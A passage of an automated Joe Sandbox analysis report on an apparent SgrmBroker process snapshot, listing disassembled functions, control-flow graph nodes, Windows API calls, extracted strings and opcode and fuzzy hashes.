7ff6d9cf4310-7ff6d9cf4320 RtlFreeHeap 2830->2835 2831->2832 2836 7ff6d9cf4380-7ff6d9cf43a0 RtlFreeHeap 2832->2836 2837 7ff6d9cf4358-7ff6d9cf4365 2832->2837 2838 7ff6d9cf4635 2833->2838 2839 7ff6d9cf4661-7ff6d9cf4674 2833->2839 2834->2825 2834->2830 2835->2834 2840 7ff6d9cf43a2-7ff6d9cf43bc RtlFreeHeap 2836->2840 2841 7ff6d9cf4367-7ff6d9cf436e 2836->2841 2837->2840 2837->2841 2842 7ff6d9cf4640-7ff6d9cf465c 2838->2842 2843 7ff6d9cf4620-7ff6d9cf462d 2839->2843 2844 7ff6d9cf4676-7ff6d9cf4686 HeapFree 2839->2844 2845 7ff6d9cf43c2-7ff6d9cf43c6 2840->2845 2846 7ff6d9cf41a0-7ff6d9cf41ad 2840->2846 2841->2845 2847 7ff6d9cf4370 2841->2847 2842->2842 2848 7ff6d9cf465e 2842->2848 2843->2827 2843->2833 2844->2843 2845->2846 2849 7ff6d9cf43cc-7ff6d9cf43d5 call 7ff6d9cf5c30 2845->2849 2846->2771 2846->2773 2847->2846 2848->2839 2849->2846
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap$CloseCounterHandleRemove
                                                                                      • String ID:
                                                                                      • API String ID: 1366079419-0
                                                                                      • Opcode ID: 154a2e87eaab93ee58e853b70127dc7c9e1edf396652835a1a7629be190e324b
                                                                                      • Instruction ID: c8e39951a274d193bce0d14139653e117b3bd4fb9e7027dede31e7e998e0f2e4
                                                                                      • Opcode Fuzzy Hash: 154a2e87eaab93ee58e853b70127dc7c9e1edf396652835a1a7629be190e324b
                                                                                      • Instruction Fuzzy Hash: CEE19422B0AA4281EB559F2AA44837D67B1BF88BE8F454137CE5D977D4DF3CE4658300
                                                                                      Function 00007FF6D9CF1680 Relevance: 27.8, APIs: 18, Instructions: 752memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocateArrayDestroyErrorFreeInfoPrngProcessSafe
                                                                                      • String ID:
                                                                                      • API String ID: 2479993482-0
                                                                                      • Opcode ID: 7d71b51fcbd30d1e8c50c97454091c2645adfb4ad59fa8785b6ec23a2b35a9de
                                                                                      • Instruction ID: d7c4b1d6a677af21823bb8e089750bb313615eb0768d28a9735d772ace85ee18
                                                                                      • Opcode Fuzzy Hash: 7d71b51fcbd30d1e8c50c97454091c2645adfb4ad59fa8785b6ec23a2b35a9de
                                                                                      • Instruction Fuzzy Hash: C6825B32A19BC181E7718F15E4403AEB7B0FB98B98F448126DA8D93B98DF7CD565CB00
                                                                                      Function 00007FF6D9CFAD98 Relevance: 20.0, APIs: 6, Strings: 5, Instructions: 740memoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 3007 7ff6d9cfad98-7ff6d9cfae7d call 7ff6d9cf6d30 call 7ff6d9cf28b0 3012 7ff6d9cfae83-7ff6d9cfaebd 3007->3012 3013 7ff6d9cfb566-7ff6d9cfb683 HeapFree call 7ff6d9cf66a0 call 7ff6d9dbf4b0 3007->3013 3014 7ff6d9cfaebf-7ff6d9cfaee0 3012->3014 3015 7ff6d9cfaef8-7ff6d9cfaf40 ProcessPrng 3012->3015 3037 7ff6d9cfb7db-7ff6d9cfb8de call 7ff6d9cf62c0 call 7ff6d9dbf4b0 3013->3037 3038 7ff6d9cfb697-7ff6d9cfb69f 3013->3038 3017 7ff6d9cfaf47-7ff6d9cfafaf 3014->3017 3015->3017 3020 7ff6d9cfafb5-7ff6d9cfafe8 3017->3020 3021 7ff6d9cfb376-7ff6d9cfb38c 3017->3021 3022 7ff6d9cfb071-7ff6d9cfb07e 3020->3022 3023 7ff6d9cfb3b1-7ff6d9cfb3ba 3021->3023 3024 7ff6d9cfb38e-7ff6d9cfb395 3021->3024 3022->3021 3028 7ff6d9cfb084-7ff6d9cfb0b2 3022->3028 3029 7ff6d9cfb3d3-7ff6d9cfb3ed 3023->3029 3030 7ff6d9cfb3bc-7ff6d9cfb3cd HeapFree 3023->3030 3027 7ff6d9cfb3a0-7ff6d9cfb3af call 7ff6d9cf3d90 3024->3027 3027->3023 3033 7ff6d9cfb0b4-7ff6d9cfb0f6 call 7ff6d9cf4b50 3028->3033 3034 7ff6d9cfb060-7ff6d9cfb06b call 7ff6d9cf3d90 3028->3034 3035 7ff6d9cfb3f3-7ff6d9cfb3f6 3029->3035 3036 7ff6d9cfb4c2-7ff6d9cfb4c7 3029->3036 3030->3029 3056 7ff6d9cfb0f8-7ff6d9cfb117 3033->3056 3034->3022 3034->3023 3042 7ff6d9cfb3fc-7ff6d9cfb41b 3035->3042 3043 7ff6d9cfb48b-7ff6d9cfb4a6 3035->3043 3048 7ff6d9cfb4cd 3036->3048 3037->3038 3080 7ff6d9cfb8e4-7ff6d9cfb9c1 call 7ff6d9cf6290 call 7ff6d9dbf4b0 3037->3080 3045 7ff6d9cfb6a5-7ff6d9cfb6ad 3038->3045 3046 7ff6d9cfb9c7-7ff6d9cfbaca call 7ff6d9cf6a20 call 7ff6d9dbf4b0 3038->3046 3050 7ff6d9cfb430-7ff6d9cfb434 3042->3050 3043->3036 3044 7ff6d9cfb4a8-7ff6d9cfb4bc HeapFree 3043->3044 3044->3036 3053 7ff6d9cfb6b3-7ff6d9cfb6bc 3045->3053 3054 7ff6d9cfbad0-7ff6d9cfbbf8 call 7ff6d9cf7120 call 7ff6d9dbf4b0 3045->3054 3046->3053 3046->3054 3048->3013 3057 7ff6d9cfb461-7ff6d9cfb473 3050->3057 3058 7ff6d9cfb436 3050->3058 3060 7ff6d9cfb6c2-7ff6d9cfb6c7 3053->3060 3061 7ff6d9cfbbfe-7ff6d9cfbd10 call 7ff6d9cf6460 call 7ff6d9dbf4b0 3053->3061 3054->3060 3054->3061 3063 7ff6d9cfb14d-7ff6d9cfb165 3056->3063 3064 7ff6d9cfb119-7ff6d9cfb125 3056->3064 3067 7ff6d9cfb475-7ff6d9cfb489 HeapFree 3057->3067 3068 7ff6d9cfb420-7ff6d9cfb42e 3057->3068 3065 7ff6d9cfb440-7ff6d9cfb45c 3058->3065 3071 7ff6d9cfb6cd-7ff6d9cfb6d5 3060->3071 3072 7ff6d9cfbd16-7ff6d9cfbe10 call 7ff6d9cf6670 call 7ff6d9dbf4b0 3060->3072 3061->3071 3061->3072 3076 7ff6d9cfb140-7ff6d9cfb14b 3063->3076 3077 7ff6d9cfb167-7ff6d9cfb17e 3063->3077 3064->3034 3074 7ff6d9cfb12b-7ff6d9cfb139 3064->3074 3065->3065 3075 7ff6d9cfb45e 3065->3075 3067->3068 3068->3043 3068->3050 3082 7ff6d9cfb6db-7ff6d9cfb6de 3071->3082 3083 7ff6d9cfbe16-7ff6d9cfbf26 call 7ff6d9cf6fa0 call 7ff6d9dbf4b0 3071->3083 3072->3082 3072->3083 3074->3056 3075->3057 3076->3063 3076->3064 3077->3076 3086 7ff6d9cfb180-7ff6d9cfb185 3077->3086 3080->3045 3080->3046 3091 7ff6d9cfb6e4-7ff6d9cfb7d6 call 7ff6d9cf6640 call 7ff6d9dbf4b0 call 7ff6d9dc98f0 3082->3091 3092 7ff6d9cfbf2c-7ff6d9cfbf31 call 7ff6d9dc98f0 3082->3092 3083->3091 3083->3092 3086->3034 3087 7ff6d9cfb18b-7ff6d9cfb192 3086->3087 3087->3013 3095 7ff6d9cfb198-7ff6d9cfb19c 3087->3095 3091->3037 3102 7ff6d9cfb19e-7ff6d9cfb1b2 call 7ff6d9dc9960 3095->3102 3103 7ff6d9cfb1bd 3095->3103 3102->3013 3117 7ff6d9cfb1b8-7ff6d9cfb1bb 3102->3117 3111 7ff6d9cfb1c2-7ff6d9cfb1f7 call 7ff6d9dd4fe0 call 7ff6d9cf4b50 3103->3111 3122 7ff6d9cfb1fd-7ff6d9cfb230 3111->3122 3123 7ff6d9cfb35c-7ff6d9cfb371 call 7ff6d9de0aa0 3111->3123 3117->3111 3125 7ff6d9cfb232-7ff6d9cfb254 3122->3125 3123->3021 3127 7ff6d9cfb2bd-7ff6d9cfb2d4 3125->3127 3128 7ff6d9cfb256-7ff6d9cfb25f 3125->3128 3129 7ff6d9cfb2b0-7ff6d9cfb2bb 3127->3129 3130 7ff6d9cfb2d6-7ff6d9cfb2eb call 7ff6d9dd4ee0 3127->3130 3131 7ff6d9cfb261-7ff6d9cfb277 3128->3131 3132 7ff6d9cfb27c-7ff6d9cfb290 3128->3132 3129->3127 3129->3128 3130->3129 3139 7ff6d9cfb2ed-7ff6d9cfb319 3130->3139 3131->3132 3133 7ff6d9cfb336-7ff6d9cfb341 3132->3133 3134 7ff6d9cfb296-7ff6d9cfb2a4 3132->3134 3137 7ff6d9cfafed-7ff6d9cfb057 3133->3137 3138 7ff6d9cfb347-7ff6d9cfb357 3133->3138 3134->3125 3137->3034 3138->3137 3139->3034 3140 7ff6d9cfb31f-7ff6d9cfb331 HeapFree 3139->3140 3140->3034
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$Heap$String$PrngProcess
                                                                                      • String ID: displayN$displayN$displayN$displayName$playName
                                                                                      • API String ID: 4214144531-1313144357
                                                                                      • Opcode ID: 2b342e5f85685317ce02a23e819d8e80e0b7b38f641c62df627f9f30b7e79569
                                                                                      • Instruction ID: 40e60f3e7ae5ff9e4e65e336a6e121de48e2898d6246936b5d30d3ea18fe73c8
                                                                                      • Opcode Fuzzy Hash: 2b342e5f85685317ce02a23e819d8e80e0b7b38f641c62df627f9f30b7e79569
                                                                                      • Instruction Fuzzy Hash: 9682F436609BC585EA618F15E4403EEB7B4FB99784F408226DACD83B59EF7CD1A4CB40
                                                                                      Function 00007FF6D9CFAEE2 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 546COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ROOT\CIMV2$WQLEmptyNullStringI1I2I4I8R4R8BoolUI1UI2UI4UI8ArrayObjectIUnknownWrapperinner$c
                                                                                      • API String ID: 0-3019736420
                                                                                      • Opcode ID: 99531c3c7453a8e4d84afae31c3e5beb014a172f2344b6765ea1f23d0f19871b
                                                                                      • Instruction ID: bf52744311e311aad9a600dd4bbabd9e02cf7ca034801ff7797e162f2940fd86
                                                                                      • Opcode Fuzzy Hash: 99531c3c7453a8e4d84afae31c3e5beb014a172f2344b6765ea1f23d0f19871b
                                                                                      • Instruction Fuzzy Hash: AE523632609B8185EA618F16E4403AEB7A4FB98B84F048136DECD87BA9DF7CD561C740
                                                                                      Function 00007FF6D9DD0ED0 Relevance: 10.6, APIs: 7, Instructions: 125comCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 3757 7ff6d9dd0ed0-7ff6d9dd0f1b CoCreateInstance 3758 7ff6d9dd0fe3-7ff6d9dd1003 GetErrorInfo 3757->3758 3759 7ff6d9dd0f21-7ff6d9dd0f29 3757->3759 3762 7ff6d9dd1005 3758->3762 3763 7ff6d9dd100b 3758->3763 3760 7ff6d9dd100e-7ff6d9dd1015 3759->3760 3761 7ff6d9dd0f2f-7ff6d9dd0f7b call 7ff6d9dd08f0 3759->3761 3764 7ff6d9dd1060-7ff6d9dd106f 3760->3764 3768 7ff6d9dd0f81-7ff6d9dd0f89 3761->3768 3769 7ff6d9dd1017-7ff6d9dd1037 GetErrorInfo 3761->3769 3762->3763 3763->3760 3772 7ff6d9dd1042-7ff6d9dd1045 3768->3772 3773 7ff6d9dd0f8f-7ff6d9dd0f92 3768->3773 3770 7ff6d9dd103f 3769->3770 3771 7ff6d9dd1039 3769->3771 3770->3772 3771->3770 3774 7ff6d9dd1050-7ff6d9dd1053 3772->3774 3775 7ff6d9dd1047-7ff6d9dd104a SysFreeString 3772->3775 3776 7ff6d9dd0f94-7ff6d9dd0f97 SysFreeString 3773->3776 3777 7ff6d9dd0f9d-7ff6d9dd0fd4 CoSetProxyBlanket 3773->3777 3778 7ff6d9dd1057-7ff6d9dd105a 3774->3778 3775->3774 3776->3777 3779 7ff6d9dd1070-7ff6d9dd1090 GetErrorInfo 3777->3779 3780 7ff6d9dd0fda-7ff6d9dd0fe1 3777->3780 3778->3764 3781 7ff6d9dd1092 3779->3781 3782 7ff6d9dd1098-7ff6d9dd10a7 3779->3782 3780->3778 3781->3782 3782->3778
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorInfo$FreeString$BlanketCreateInstanceProxy
                                                                                      • String ID:
                                                                                      • API String ID: 2152923335-0
                                                                                      • Opcode ID: cefaa8679dd2d47a1e7ea3fdb189a3170873cfb4e18a35ab71da528795d5223e
                                                                                      • Instruction ID: e7a0141d733b470fb9732790d298aaf597dbf939229a143ccd3bb7b8076a98c8
                                                                                      • Opcode Fuzzy Hash: cefaa8679dd2d47a1e7ea3fdb189a3170873cfb4e18a35ab71da528795d5223e
                                                                                      • Instruction Fuzzy Hash: F9516C32608B8182EB549F65E59473EB7A0FF88B94F048136DE8A87B54DFBDD0548B40
                                                                                      Function 00007FF6D9DDEF40 Relevance: 8.1, APIs: 1, Strings: 4, Instructions: 592COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 3784 7ff6d9ddef40-7ff6d9ddef5b 3785 7ff6d9ddef61-7ff6d9ddefa5 3784->3785 3786 7ff6d9ddf85a-7ff6d9ddf85f 3784->3786 3787 7ff6d9ddefa7-7ff6d9ddefc2 3785->3787 3788 7ff6d9ddefd9-7ff6d9ddefe4 3785->3788 3789 7ff6d9ddf32a-7ff6d9ddf32e 3787->3789 3790 7ff6d9ddefc8-7ff6d9ddefcc 3787->3790 3791 7ff6d9ddefe6-7ff6d9ddeff7 3788->3791 3792 7ff6d9ddeff9-7ff6d9ddf006 3788->3792 3797 7ff6d9ddf330-7ff6d9ddf342 call 7ff6d9dd4fe0 3789->3797 3798 7ff6d9ddf34b-7ff6d9ddf34f 3789->3798 3793 7ff6d9ddefd2-7ff6d9ddefd4 3790->3793 3794 7ff6d9ddf2c9-7ff6d9ddf2d8 3790->3794 3795 7ff6d9ddf047-7ff6d9ddf052 3791->3795 3792->3786 3796 7ff6d9ddf00c-7ff6d9ddf044 3792->3796 3800 7ff6d9ddf314-7ff6d9ddf325 3793->3800 3801 7ff6d9ddf2e0-7ff6d9ddf30e 3794->3801 3795->3786 3802 7ff6d9ddf058-7ff6d9ddf05f 3795->3802 3796->3795 3799 7ff6d9ddf355-7ff6d9ddf3ac 3797->3799 3811 7ff6d9ddf344-7ff6d9ddf346 3797->3811 3798->3799 3804 7ff6d9ddf3d9-7ff6d9ddf3dd 3799->3804 3800->3789 3801->3801 3805 7ff6d9ddf310-7ff6d9ddf312 3801->3805 3802->3786 3806 7ff6d9ddf065-7ff6d9ddf078 3802->3806 3808 7ff6d9ddf3c5-7ff6d9ddf3d3 3804->3808 3809 7ff6d9ddf3df-7ff6d9ddf414 3804->3809 3805->3789 3805->3800 3806->3786 3810 7ff6d9ddf07e-7ff6d9ddf081 3806->3810 3808->3804 3812 7ff6d9ddf81d-7ff6d9ddf826 3808->3812 3813 7ff6d9ddf479-7ff6d9ddf48d 3809->3813 3810->3786 3814 7ff6d9ddf087-7ff6d9ddf090 call 7ff6d9dc9960 3810->3814 3815 7ff6d9ddf82a-7ff6d9ddf838 3811->3815 3812->3815 3817 7ff6d9ddf493-7ff6d9ddf4a8 3813->3817 3818 7ff6d9ddf520-7ff6d9ddf53e 3813->3818 3820 7ff6d9ddf095-7ff6d9ddf098 3814->3820 3816 7ff6d9ddf842-7ff6d9ddf859 3815->3816 3821 7ff6d9ddf4b0-7ff6d9ddf4f1 3817->3821 3822 7ff6d9ddf4fe-7ff6d9ddf50e 3818->3822 3823 7ff6d9ddf540-7ff6d9ddf54c 3818->3823 3820->3786 3824 7ff6d9ddf09e-7ff6d9ddf0dc call 7ff6d9dd5690 3820->3824 3821->3821 3825 7ff6d9ddf4f3-7ff6d9ddf4fc 3821->3825 3826 7ff6d9ddf54e-7ff6d9ddf56f 3822->3826 3827 7ff6d9ddf510 3822->3827 3823->3826 3828 7ff6d9ddf573-7ff6d9ddf575 3823->3828 3837 7ff6d9ddf0e2-7ff6d9ddf121 3824->3837 3838 7ff6d9ddf258-7ff6d9ddf260 3824->3838 3825->3822 3825->3823 3826->3828 3827->3828 3829 7ff6d9ddf590-7ff6d9ddf593 3828->3829 3830 7ff6d9ddf577-7ff6d9ddf58a 3828->3830 3832 7ff6d9ddf595-7ff6d9ddf5ab 3829->3832 3833 7ff6d9ddf5e7-7ff6d9ddf5ec 3829->3833 3830->3832 3835 7ff6d9ddf5f0-7ff6d9ddf6e9 3832->3835 3836 7ff6d9ddf5ad-7ff6d9ddf5e5 3832->3836 3833->3835 3841 7ff6d9ddf6eb-7ff6d9ddf6fe 3835->3841 3842 7ff6d9ddf718-7ff6d9ddf726 3835->3842 3836->3835 3840 7ff6d9ddf196-7ff6d9ddf199 3837->3840 3839 7ff6d9ddf265-7ff6d9ddf287 3838->3839 3839->3816 3843 7ff6d9ddf28d-7ff6d9ddf2a7 3839->3843 3844 7ff6d9ddf19b 3840->3844 3845 7ff6d9ddf1bd-7ff6d9ddf1fe call 7ff6d9cf4b50 3840->3845 3846 7ff6d9ddf700-7ff6d9ddf716 3841->3846 3847 7ff6d9ddf734-7ff6d9ddf74a 3842->3847 3848 7ff6d9ddf728-7ff6d9ddf730 3842->3848 3843->3816 3849 7ff6d9ddf2ad-7ff6d9ddf2c4 HeapFree 3843->3849 3850 7ff6d9ddf1a0-7ff6d9ddf1b9 3844->3850 3859 7ff6d9ddf200-7ff6d9ddf206 3845->3859 3860 7ff6d9ddf227-7ff6d9ddf235 3845->3860 3846->3842 3846->3846 3852 7ff6d9ddf3b0-7ff6d9ddf3bf 3847->3852 3853 7ff6d9ddf750-7ff6d9ddf779 3847->3853 3848->3847 3849->3816 3850->3850 3855 7ff6d9ddf1bb 3850->3855 3854 7ff6d9ddf3c3 3852->3854 3857 7ff6d9ddf7e0-7ff6d9ddf818 3853->3857 3858 7ff6d9ddf77b-7ff6d9ddf787 3853->3858 3854->3808 3855->3845 3857->3854 3861 7ff6d9ddf420-7ff6d9ddf475 3858->3861 3862 7ff6d9ddf78d-7ff6d9ddf792 3858->3862 3865 7ff6d9ddf210-7ff6d9ddf225 3859->3865 3863 7ff6d9ddf130-7ff6d9ddf190 3860->3863 3864 7ff6d9ddf23b-7ff6d9ddf247 3860->3864 3861->3813 3862->3861 3866 7ff6d9ddf798-7ff6d9ddf79f 3862->3866 3863->3840 3868 7ff6d9ddf24c-7ff6d9ddf256 3863->3868 3864->3863 3865->3860 3865->3865 3867 7ff6d9ddf7a0-7ff6d9ddf7ca 3866->3867 3867->3867 3869 7ff6d9ddf7cc 3867->3869 3868->3839 3869->3813
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: arenegyl$modnarod$setybdet$uespemos
                                                                                      • API String ID: 0-66988881
                                                                                      • Opcode ID: a9c401846955f20bb67985c4b005eb24b45b8f4170ddd1b87e594bc8d3f53a66
                                                                                      • Instruction ID: 47ae5da46ee8049b0b1b8f3055f70fbc62664493d97da9141f6571c61980a22c
                                                                                      • Opcode Fuzzy Hash: a9c401846955f20bb67985c4b005eb24b45b8f4170ddd1b87e594bc8d3f53a66
                                                                                      • Instruction Fuzzy Hash: 9A2232A2B29F8582EA148F6DA40057D6761FB89BE4F409336DEAE973D5EF3CC1518300
                                                                                      Function 00007FF6D9DCF390 Relevance: 7.6, APIs: 5, Instructions: 93memorynativeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeapInformationProcessQuery$ErrorInfo
                                                                                      • String ID:
                                                                                      • API String ID: 2435025923-0
                                                                                      • Opcode ID: 6acfa91e5c25f6d6f1330cd990612bbe57679b0e96ca0712aaea64567012cfd3
                                                                                      • Instruction ID: ce80b635d98a17c93812c5f5f77e5f6f790ab5f22956a141deb0b09b1dd9f71f
                                                                                      • Opcode Fuzzy Hash: 6acfa91e5c25f6d6f1330cd990612bbe57679b0e96ca0712aaea64567012cfd3
                                                                                      • Instruction Fuzzy Hash: D331A162B08F0191FB649F26E45037E66A1EF8CB94F544232DE8EC7BA4DE3CD5618300
                                                                                      Function 00007FF6D9CF7E40 Relevance: 6.8, APIs: 2, Strings: 2, Instructions: 756memoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 3903 7ff6d9cf7e40-7ff6d9cf7ef7 call 7ff6d9cf79f0 call 7ff6d9cf6c00 call 7ff6d9dc9960 3910 7ff6d9cf8a8c-7ff6d9cf8a8f 3903->3910 3911 7ff6d9cf7efd-7ff6d9cf7fb4 call 7ff6d9cf79f0 call 7ff6d9cf6620 call 7ff6d9dc9960 3903->3911 3913 7ff6d9cf8a90-7ff6d9cf8ac7 call 7ff6d9dd0e00 3910->3913 3911->3910 3925 7ff6d9cf7fba-7ff6d9cf806c call 7ff6d9cf79f0 call 7ff6d9cf6d50 call 7ff6d9dc9960 3911->3925 3916 7ff6d9cf8acc-7ff6d9cfb683 HeapFree call 7ff6d9cf66a0 call 7ff6d9dbf4b0 3913->3916 3932 7ff6d9cfb7db-7ff6d9cfb8de call 7ff6d9cf62c0 call 7ff6d9dbf4b0 3916->3932 3933 7ff6d9cfb697-7ff6d9cfb69f 3916->3933 3925->3910 3947 7ff6d9cf8072-7ff6d9cf80fe call 7ff6d9cf79f0 call 7ff6d9cf6a80 call 7ff6d9dc9960 3925->3947 3932->3933 3958 7ff6d9cfb8e4-7ff6d9cfb9c1 call 7ff6d9cf6290 call 7ff6d9dbf4b0 3932->3958 3935 7ff6d9cfb6a5-7ff6d9cfb6ad 3933->3935 3936 7ff6d9cfb9c7-7ff6d9cfbaca call 7ff6d9cf6a20 call 7ff6d9dbf4b0 3933->3936 3940 7ff6d9cfb6b3-7ff6d9cfb6bc 3935->3940 3941 7ff6d9cfbad0-7ff6d9cfbbf8 call 7ff6d9cf7120 call 7ff6d9dbf4b0 3935->3941 3936->3940 3936->3941 3945 7ff6d9cfb6c2-7ff6d9cfb6c7 3940->3945 3946 7ff6d9cfbbfe-7ff6d9cfbd10 call 7ff6d9cf6460 call 7ff6d9dbf4b0 3940->3946 3941->3945 3941->3946 3952 7ff6d9cfb6cd-7ff6d9cfb6d5 3945->3952 3953 7ff6d9cfbd16-7ff6d9cfbe10 call 7ff6d9cf6670 call 7ff6d9dbf4b0 3945->3953 3946->3952 3946->3953 3947->3910 3991 7ff6d9cf8104-7ff6d9cf81b6 call 7ff6d9cf79f0 call 7ff6d9cf6370 call 7ff6d9dc9960 3947->3991 3960 7ff6d9cfb6db-7ff6d9cfb6de 3952->3960 3961 7ff6d9cfbe16-7ff6d9cfbf26 